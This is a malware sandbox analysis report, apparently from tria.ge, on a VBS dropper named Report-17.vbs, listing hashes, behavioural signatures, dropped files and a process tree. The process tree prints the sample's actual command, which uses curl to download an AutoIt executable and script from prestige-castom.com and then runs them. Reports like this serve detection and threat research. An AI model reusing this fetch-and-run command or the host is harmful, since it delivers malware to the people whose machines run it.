Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    142s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/10/2023, 15:46

General

  • Target

    Report-17.vbs

  • Size

    16KB

  • MD5

    902d4e9234583e12da2d0078d37f5a30

  • SHA1

    7ced5e82455bc1afc788ebf13170f76a219edea2

  • SHA256

    5c084328ab45eb579d31c3157b0f486cbfea6ca0dfd89dda2084ace5745b9549

  • SHA512

    8a0e61e9d3110de4aa10c63b60dd0ace4b3725915c3e20d225986f94c30bd4fe181e94bb21d2771c458b256bdea2028a24f4d6e56c012d46da6032175810c1da

  • SSDEEP

    384:SzE0ig4KR/aQsKsWMnkf+cTPgKekvj27vmJYs:AJHsXkfNEKekvq7eJz

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Report-17.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3716
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cd /d %temp% & curl -o Autoit3.exe http://prestige-castom.com:2351 & curl -o ymehvz.au3 http://prestige-castom.com:2351/msirzgnzamg & Autoit3.exe ymehvz.au3
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3496
      • C:\Windows\system32\curl.exe
        curl -o Autoit3.exe http://prestige-castom.com:2351
        3⤵
          PID:3808
        • C:\Windows\system32\curl.exe
          curl -o ymehvz.au3 http://prestige-castom.com:2351/msirzgnzamg
          3⤵
            PID:4352
          • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe
            Autoit3.exe ymehvz.au3
            3⤵
            • Executes dropped EXE
            • Checks processor information in registry
            PID:1568
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
        1⤵
          PID:3680
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k UnistackSvcGroup
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:420

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Autoit3.exe

          Filesize

          872KB

          MD5

          c56b5f0201a3b3de53e561fe76912bfd

          SHA1

          2a4062e10a5de813f5688221dbeb3f3ff33eb417

          SHA256

          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

          SHA512

          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

        • C:\Users\Admin\AppData\Local\Temp\ymehvz.au3

          Filesize

          102KB

          MD5

          151711041ee1619088258f05a5d3bd5b

          SHA1

          d2047aaf530ce0db076ea7cc7e548fd5a35cee55

          SHA256

          ead5d943a69f2d8641612415c77ad26daa6d53e1c6ea0270a91d3121eafd943d

          SHA512

          1085c381dc8f97353bed29e96a10a2e8ba4a6df761c2af56f9cced5cc6b49c80c388e280a2d53b09e20b4e19f1bdcc813d687d52f7f31679f6ee1c84c23037a1

        • C:\temp\gqcsfd

          Filesize

          388KB

          MD5

          1ddcfa52d781f75190c18c48e9645b63

          SHA1

          e2976a957580fde87caa6dd615e01a574292b564

          SHA256

          1f77719d1f2ffee980d89e74904859e7d098ac1f7d1d09a0e406b1a4a1f8e23c

          SHA512

          7882772319b3a801b72ebfad7674c35f43261f9f7aa0b163e49da0d898090ca1380db5b209b6263889a1180c68bd75ac6d53fb0fbaeebfca96f167f51a607afb

        • memory/420-27-0x000001E77FA50000-0x000001E77FA60000-memory.dmp

          Filesize

          64KB

        • memory/420-43-0x000001E77FB50000-0x000001E77FB60000-memory.dmp

          Filesize

          64KB

        • memory/420-59-0x000001E77FEC0000-0x000001E77FEC1000-memory.dmp

          Filesize

          4KB

        • memory/420-61-0x000001E77FEF0000-0x000001E77FEF1000-memory.dmp

          Filesize

          4KB

        • memory/420-63-0x000001E708000000-0x000001E708001000-memory.dmp

          Filesize

          4KB

        • memory/420-62-0x000001E77FEF0000-0x000001E77FEF1000-memory.dmp

          Filesize

          4KB

        • memory/1568-18-0x0000000000F30000-0x0000000001330000-memory.dmp

          Filesize

          4.0MB

        • memory/1568-25-0x0000000005100000-0x00000000052E9000-memory.dmp

          Filesize

          1.9MB

        • memory/1568-26-0x0000000005100000-0x00000000052E9000-memory.dmp

          Filesize

          1.9MB